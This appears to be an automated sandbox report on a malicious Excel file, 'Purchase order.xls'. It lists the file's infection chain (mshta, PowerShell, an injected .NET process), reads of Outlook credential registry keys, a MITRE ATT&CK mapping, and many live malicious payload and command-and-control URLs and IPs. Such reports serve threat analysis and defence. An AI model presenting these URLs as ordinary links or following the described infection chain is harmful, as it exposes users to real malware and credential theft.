Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: PopPassword		26_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: SmtpPassword		26_2_0040D069

Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	23 Exploitation for Client Execution	121 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 Account Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	121 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	21 Obfuscated Files or Information	2 Credentials in Registry	2 File and Directory Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	211 Process Injection	1 Install Root Certificate	Security Account Manager	14 System Information Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Security Software Discovery	Distributed Component Object Model	11 Email Collection	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase order.xls	16%	ReversingLabs
Purchase order.xls	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://go.micros	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
qrisni.me	188.114.97.3	true	false	unknown
drive.google.com	142.250.186.46	true	false	unknown
drive.usercontent.google.com	142.250.186.161	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	unknown
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddle	false	unknown
http://alphastand.top/alien/fre.php	true	unknown
http://alphastand.win/alien/fre.php	true	unknown
http://alphastand.trade/alien/fre.php	true	unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF	true	unknown
http://94.156.177.220/simple/five/fre.php	true	unknown
http://192.3.176.141/41/SMPLRTT.txt	true	unknown
94.156.177.220/simple/five/fre.php	true	unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://qrisni.me/	mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/simpleth	powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/C	mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/	mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qo	mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/	mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1	mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/Z	mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaG	mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/c	mshta.exe, 00000004.00000003.463769480.0000000002955000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.488620769.0000000003575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489793798.0000000003575000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:	mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.micros	powershell.exe, 00000005.00000002.511869443.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wa	mshta.exe, 00000008.00000002.491361921.000000000018F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003841000.00000004.00000020.00020000.00000000.sdmp, Purchase order.xls, 23530000.0.dr	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525	mshta.exe, 00000004.00000003.463199089.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463213758.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:	mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com	powershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89	powershell.exe, 00000005.00000002.519761992.000000001A220000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.499089877.000000001A89E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://qrisni.me/1;	mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.511869443.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.667153899.000000000230F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.565176374.0000000002391000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFp	powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/h	mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.cr	powershell.exe, 00000005.00000002.520257981.000000001C14B000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.3.176.141	unknown	United States	36352	AS-COLOCROSSINGUS	true
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
188.114.97.3	qrisni.me	European Union	13335	CLOUDFLARENETUS	false
142.250.186.161	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
94.156.177.220	unknown	Bulgaria	43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542327
Start date and time:	2024-10-25 19:49:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase order.xls
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLS@29/44@6/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target mshta.exe, PID 3164 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3848 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Purchase order.xls

Simulations

Behavior and APIs

Time	Type	Description
13:50:45	API Interceptor	151x Sleep call for process: mshta.exe modified
13:50:59	API Interceptor	614x Sleep call for process: powershell.exe modified
13:51:16	API Interceptor	25x Sleep call for process: wscript.exe modified
13:51:48	API Interceptor	400x Sleep call for process: aspnet_regbrowsers.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.3.176.141	Payment Advice.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/42/LOGLKI.txt
	seethebestthingsevermeetwithgreatthingstobegood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
	greatthingswithgoodnewsgivenbygodthingsgreat.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
	seethebestthingstobegoodwithhislifebestthigns.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
	nicegirlwithnewthingswhichevennobodknowthatkissingme.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	192.3.176.141/35/SMLPERR.txt
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/36/LOGS%20LOKI.txt
	Logs.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/43/LCRDDFR.txt
	logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
	greatwayforbestthignswithwhonotwanttodo.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
188.114.97.3	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
